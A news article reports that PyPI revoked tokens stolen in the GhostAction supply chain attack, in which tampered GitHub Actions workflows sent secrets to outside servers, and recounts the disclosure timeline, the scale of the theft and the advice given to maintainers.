PyPI Revokes Tokens Stolen in GhostAction Attack
The Python Software Foundation (PSF) has revoked all PyPI tokens stolen during the GhostAction supply chain attack earlier this month. Investigators stressed that the attackers did not use the stolen tokens to publish malicious packages.
How the Attack Unfolded
In early September, researchers at GitGuardian discovered that malicious GitHub Actions workflows—such as FastUUID—were attempting to steal PyPI tokens by sending them to a remote server. GitGuardian reported the incident to the PyPI security team the same day, but the alert was mistakenly flagged as spam, delaying the response until September 10.
GitGuardian later assessed that more than 3,300 secrets had been stolen in the attack, including PyPI tokens, npm tokens, DockerHub credentials, GitHub tokens, Cloudflare API keys, AWS keys, and various database credentials. Once the full scope was understood, GitGuardian filed issues in over 570 affected GitHub repositories and alerted the security teams at GitHub, npm, and PyPI.
Community and Platform Response
Following the notifications, many project maintainers rotated their PyPI tokens, rolled back changes, or deleted compromised workflows.
Although the PyPI team found no evidence that its repository was compromised, administrators decided to revoke all affected tokens as a precaution. They also reached out to project owners to help secure accounts that may have been exposed.
Strengthening Defenses
PyPI administrator Mike Fiedler urged maintainers who use GitHub Actions to migrate from long-lived tokens to short-lived Trusted Publishers tokens, which are less vulnerable to theft in supply chain attacks. He also recommended that developers log into their accounts and review activity logs for suspicious behavior.
“It appears the attackers targeted a wide range of repositories—many of which contained PyPI tokens stored as GitHub Secrets—by modifying workflows to send tokens to external servers. While the attackers successfully exfiltrated some tokens, they do not appear to have used them on PyPI,” Fiedler wrote.
